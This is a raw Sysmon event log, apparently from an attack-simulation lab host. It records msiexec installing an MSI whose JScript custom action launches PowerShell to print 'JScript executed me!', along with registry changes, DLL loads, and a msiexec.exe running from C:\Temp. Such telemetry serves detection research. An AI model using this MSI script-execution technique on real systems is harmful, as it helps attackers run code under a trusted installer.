534500x80000000000000002701268Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.979{7CF983DC-9838-62AC-616B-000000006202}4400C:\Temp\msiexec.exeWIN-HOST-MHAAG-\Administrator 534500x80000000000000002701267Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.963{7CF983DC-9838-62AC-626B-000000006202}3972C:\Windows\System32\msiexec.exeWIN-HOST-MHAAG-\Administrator 12241200x80000000000000002701266Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-DeleteKey2022-06-17 15:05:28.963{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000NT AUTHORITY\SYSTEM 12241200x80000000000000002701265Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-DeleteValue2022-06-17 15:05:28.963{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000\OwnerNT AUTHORITY\SYSTEM 12241200x80000000000000002701264Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-DeleteValue2022-06-17 15:05:28.963{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000\SessionHashNT AUTHORITY\SYSTEM 12241200x80000000000000002701263Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-DeleteValue2022-06-17 15:05:28.963{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000\SequenceNT AUTHORITY\SYSTEM 12241200x80000000000000002701262Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:28.963{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000NT AUTHORITY\SYSTEM 12241200x80000000000000002701261Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:28.963{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000NT AUTHORITY\SYSTEM 12241200x80000000000000002701260Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:28.963{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000NT AUTHORITY\SYSTEM 12241200x80000000000000002701259Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:28.963{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000NT AUTHORITY\SYSTEM 12241200x80000000000000002701258Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:28.963{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000NT AUTHORITY\SYSTEM 12241200x80000000000000002701257Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:28.963{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000NT AUTHORITY\SYSTEM 23542300x80000000000000002701256Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.963{7CF983DC-981D-62AC-1A6B-000000006202}4840NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Installer\e4f514b.msiMD5=47B535A9C2480FAD4788850FF2AE76D2,SHA256=3293A5CB821F391F6B0E1328D23B15047C4A43EFBFEEF5FEA057DBACDBD68D85falsetrue 10341000x80000000000000002700875Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.698{7CF983DC-9838-62AC-626B-000000006202}39724500C:\Windows\System32\MsiExec.exe{7CF983DC-9838-62AC-636B-000000006202}2420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791WIN-HOST-MHAAG-\AdministratorWIN-HOST-MHAAG-\Administrator 154100x80000000000000002700874Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.710{7CF983DC-9838-62AC-636B-000000006202}2420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -Command Write-Host JScript executed me!; exitC:\Windows\system32\WIN-HOST-MHAAG-\Administrator{7CF983DC-EE99-62A8-FF22-070000000000}0x722ff2HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{7CF983DC-9838-62AC-626B-000000006202}3972C:\Windows\System32\msiexec.exeC:\Windows\System32\MsiExec.exe -Embedding 7C173E38E1EF41FEEA4D5D00A0801E5EWIN-HOST-MHAAG-\Administrator 13241300x80000000000000002700873Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-SetValue2022-06-17 15:05:28.698{7CF983DC-9838-62AC-626B-000000006202}3972C:\Windows\System32\MsiExec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetectDWORD (0x00000000)WIN-HOST-MHAAG-\Administrator 13241300x80000000000000002700872Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-SetValue2022-06-17 15:05:28.698{7CF983DC-9838-62AC-626B-000000006202}3972C:\Windows\System32\MsiExec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranetDWORD (0x00000000)WIN-HOST-MHAAG-\Administrator 13241300x80000000000000002700871Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-SetValue2022-06-17 15:05:28.698{7CF983DC-9838-62AC-626B-000000006202}3972C:\Windows\System32\MsiExec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetectDWORD (0x00000000)WIN-HOST-MHAAG-\Administrator 13241300x80000000000000002700870Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-SetValue2022-06-17 15:05:28.698{7CF983DC-9838-62AC-626B-000000006202}3972C:\Windows\System32\MsiExec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranetDWORD (0x00000000)WIN-HOST-MHAAG-\Administrator 10341000x80000000000000002700869Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.698{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9838-62AC-626B-000000006202}3972C:\Windows\System32\MsiExec.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+262f7|C:\Windows\system32\lsasrv.dll+2743d|C:\Windows\system32\lsasrv.dll+26175|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002700868Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.698{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9838-62AC-626B-000000006202}3972C:\Windows\System32\MsiExec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2c06f|C:\Windows\system32\lsasrv.dll+260bd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700867Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.698{7CF983DC-9838-62AC-626B-000000006202}3972C:\Windows\System32\msiexec.exeC:\Windows\System32\sspicli.dll10.0.14393.5006 (rs1_release.220301-1704)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsspicli.dllMD5=F0258C58C8DC45AF9B5AAF9BA49E0C53,SHA256=8E1EAA39742CC0E97D615229E9C13C8447B8D115B4678A1F03BE3E8E20345521trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 12241200x80000000000000002700866Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:28.698{7CF983DC-9838-62AC-626B-000000006202}3972C:\Windows\System32\MsiExec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMapWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700865Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.698{7CF983DC-9838-62AC-626B-000000006202}3972C:\Windows\System32\msiexec.exeC:\Windows\System32\srvcli.dll10.0.14393.5066 (rs1_release.220401-1841)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=75E3DE473374E0BCBBD1EC60036A93EC,SHA256=23EBE577D2080D4C7532184B69E44BF640BB44084F9046A5AF364268A7BDB1ECtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700864Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.698{7CF983DC-9838-62AC-626B-000000006202}3972C:\Windows\System32\msiexec.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700863Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.698{7CF983DC-9838-62AC-626B-000000006202}3972C:\Windows\System32\msiexec.exeC:\Windows\System32\iertutil.dll11.00.14393.5006 (rs1_release.220301-1704)Run time utility for Internet ExplorerInternet ExplorerMicrosoft CorporationIeRtUtil.dllMD5=153A3C6C45E23363BC842795FD49E7A3,SHA256=06DFA7248890579938106FF7527BB8FD0091A24D1C1667CB6583A4D239885141trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700862Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.698{7CF983DC-9838-62AC-626B-000000006202}3972C:\Windows\System32\msiexec.exeC:\Windows\System32\urlmon.dll11.00.14393.5006 (rs1_release.220301-1704)OLE32 Extensions for Win32Internet ExplorerMicrosoft CorporationUrlMon.dllMD5=72DA72C24A0AD3C49AC956DC083EEDF3,SHA256=2DB817631EC24840FDED7C584BC08F03D3549D93552C8E20005E18BA5E81CA12trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700861Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.698{7CF983DC-9838-62AC-626B-000000006202}3972C:\Windows\System32\msiexec.exeC:\Windows\System32\edputil.dll10.0.14393.2608 (rs1_release.181024-1742)EDP utilMicrosoft® Windows® Operating SystemMicrosoft CorporationEDPUTIL.DLLMD5=75AC86B00CE4C64B02B105A55CA35628,SHA256=DB31A2345E3BB8DC79BFB4CC29615E3B8B7638AE80BFEC45FA57852669A592AEtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 12241200x80000000000000002700860Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:28.698{7CF983DC-9838-62AC-626B-000000006202}3972C:\Windows\System32\MsiExec.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SyncRootManagerWIN-HOST-MHAAG-\Administrator 12241200x80000000000000002700859Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:28.682{7CF983DC-9838-62AC-626B-000000006202}3972C:\Windows\System32\MsiExec.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\DelegateFoldersWIN-HOST-MHAAG-\Administrator 12241200x80000000000000002700858Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:28.682{7CF983DC-9838-62AC-626B-000000006202}3972C:\Windows\System32\MsiExec.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpaceWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700857Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.682{7CF983DC-9838-62AC-626B-000000006202}3972C:\Windows\System32\msiexec.exeC:\Windows\System32\actxprxy.dll10.0.14393.3808 (rs1_release.200707-2105)ActiveX Interface Marshaling LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationActXPrxy.dllMD5=087C47C19BBFCB9F4932C03C0189E86B,SHA256=9BEE35FBFA2E595372D82E8858BE46CE7717E0399996960398BC238F4D0E5207trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700856Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.682{7CF983DC-9838-62AC-626B-000000006202}3972C:\Windows\System32\msiexec.exeC:\Windows\System32\propsys.dll7.0.14393.4169 (rs1_release.210107-1130)Microsoft Property SystemWindows® SearchMicrosoft Corporationpropsys.dllMD5=013D2BA96C261CDC62ECA7365E1C84D5,SHA256=26896478B6F1AF3756D5B1BB59BF2C6BE1C579B122CC882BAC35FEFB3EC3EE36trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700855Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.682{7CF983DC-9838-62AC-626B-000000006202}3972C:\Windows\System32\msiexec.exeC:\Windows\System32\sxs.dll10.0.14393.4169 (rs1_release.210107-1130)Fusion 2.5Microsoft® Windows® Operating SystemMicrosoft CorporationSXS.DLLMD5=54FB18CA661D074CBB60D5A58D40C8D3,SHA256=A2BD6160222A216F8A6830C1273662F8AE88F53D2CE6DA5893FF70D146A0A2B0trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700854Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.682{7CF983DC-9838-62AC-626B-000000006202}3972C:\Windows\System32\msiexec.exeC:\Windows\System32\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=CFDB018AC09F879CAAE7A66CA7880D57,SHA256=6AB95FD0D142CFFC3B9455AF51F003E1CD75B7F4323820390B975F9E1C8A47A5trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700853Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.666{7CF983DC-9838-62AC-626B-000000006202}3972C:\Windows\System32\msiexec.exeC:\Windows\System32\scrrun.dll5.812.10240.16384Microsoft ® Script RuntimeMicrosoft ® Script RuntimeMicrosoft Corporationscrrun.dllMD5=6E948305B041BE52E45E9E942C78A3F4,SHA256=93C4A201E3627E617C478054BAB472553CF48B84C32DE2F0A316F30F4A61A782trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700851Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.666{7CF983DC-9838-62AC-626B-000000006202}3972C:\Windows\System32\msiexec.exeC:\Windows\System32\mpr.dll10.0.14393.2879 (rs1_release_inmarket.190313-1855)Multiple Provider Router DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmpr.dllMD5=0E56DB60C434D51769F2DAC48B9AA686,SHA256=3F9AED98B1B7F6A59C219F622FD91C7FD20BFE280935F5334920A02ECCAE7ED6trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700850Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.666{7CF983DC-9838-62AC-626B-000000006202}3972C:\Windows\System32\msiexec.exeC:\Windows\System32\wshom.ocx5.812.10240.16384Windows Script Host Runtime LibraryMicrosoft ® Windows Script Host Runtime LibraryMicrosoft Corporationwshom.ocxMD5=012C02BB5DD8EC0FD4AC2688D8D4D0CF,SHA256=B73B3C361F6B07960B092485CE8C96A4E68F741D718C6E847FF37C5BA5227C18trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002700849Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.666{7CF983DC-EE56-62A8-1500-000000006202}10482524C:\Windows\system32\svchost.exe{7CF983DC-9838-62AC-626B-000000006202}3972C:\Windows\System32\MsiExec.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002700848Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.666{7CF983DC-EE56-62A8-1500-000000006202}10481096C:\Windows\system32\svchost.exe{7CF983DC-9838-62AC-626B-000000006202}3972C:\Windows\System32\MsiExec.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700847Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.666{7CF983DC-9838-62AC-626B-000000006202}3972C:\Windows\System32\msiexec.exeC:\Windows\System32\uxtheme.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft UxTheme LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationUxTheme.dllMD5=43AEE61AFABE70BFC876CC53D6A64E04,SHA256=8A4C893AEB075D3D9EFEC52E49CEF94471EB9F0A91BEB4C07DF38F8A48910C12trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 12241200x80000000000000002700846Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:28.666{7CF983DC-9838-62AC-626B-000000006202}3972C:\Windows\System32\MsiExec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\Windows Script\SettingsWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700845Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.666{7CF983DC-9838-62AC-626B-000000006202}3972C:\Windows\System32\msiexec.exeC:\Windows\System32\amsi.dll10.0.14393.4169 (rs1_release.210107-1130)Anti-Malware Scan InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationamsi.dllMD5=89C79675F7FEDEB6373C9D2045F7B7C5,SHA256=5B40293CF56D44377A91BF68CF2113F523B61185F02DEEAB621BE51F0ADA6131trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700844Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.666{7CF983DC-9838-62AC-626B-000000006202}3972C:\Windows\System32\msiexec.exeC:\Windows\System32\jscript.dll5.812.10240.16384Microsoft ® JScriptMicrosoft ® JScriptMicrosoft Corporationjscript.dllMD5=017AA3E55F15439E32C6F461E5686CCD,SHA256=8117D34017F6F90BC9DC68E3F79346E62E389AFE9E154FF0FCB99FB921845486trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700843Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.666{7CF983DC-9838-62AC-626B-000000006202}3972C:\Windows\System32\msiexec.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700842Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.666{7CF983DC-9838-62AC-626B-000000006202}3972C:\Windows\System32\msiexec.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75EtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002700841Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.666{7CF983DC-9838-62AC-626B-000000006202}39721608C:\Windows\System32\MsiExec.exe{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\MsiExec.exe+6bca|C:\Windows\System32\MsiExec.exe+7166|C:\Windows\System32\MsiExec.exe+8df7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791WIN-HOST-MHAAG-\AdministratorNT AUTHORITY\SYSTEM 734700x80000000000000002700840Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.666{7CF983DC-9838-62AC-626B-000000006202}3972C:\Windows\System32\msiexec.exeC:\Windows\System32\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=0BC84513575743DA177F3DFE18D35CA7,SHA256=C40F6AA73073995E05E5379AE593A6617E8296C79A78BD7F716D95F98AE0D899trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700839Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.666{7CF983DC-9838-62AC-626B-000000006202}3972C:\Windows\System32\msiexec.exeC:\Windows\System32\SHCore.dll10.0.14393.5066 (rs1_release.220401-1841)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=FC58D75DDAF44088B9101BE2418B1967,SHA256=74A0CCA04F2405A329897A6A1A3E90A0CE48E5772F85E7188C75677CD9D78160trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700838Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.666{7CF983DC-9838-62AC-626B-000000006202}3972C:\Windows\System32\msiexec.exeC:\Windows\System32\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=C55F634054E45C0DEE47C254AE009928,SHA256=76EB0FCA87C3AD5FA1C46EB0AF88CF85E172525029E33F5DFC5645EF2EE6F575trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700837Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.666{7CF983DC-9838-62AC-626B-000000006202}3972C:\Windows\System32\msiexec.exeC:\Windows\System32\windows.storage.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=BB44598D2B17603D605EDE11A148A21B,SHA256=C45410A330C2EC62581E18FD91F8CDB9873B8F64E5C5ACC79DB4970238077177trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700836Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.666{7CF983DC-9838-62AC-626B-000000006202}3972C:\Windows\System32\msiexec.exeC:\Windows\System32\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=77BF2979C1A08EBA43C24FE0B7E547BE,SHA256=071E00374806E043A2E78E88C7FDDCE8F5983DE665DF41F3B3210660BF2EF704trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700835Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.666{7CF983DC-9838-62AC-626B-000000006202}3972C:\Windows\System32\msiexec.exeC:\Windows\System32\shell32.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=B47A76105A5F59EDA244105A6D5D51D1,SHA256=012675AF0811AA0787D3731FED4D186F6D1B6279F27B2BF360AB49CA457F4E25trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002700834Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 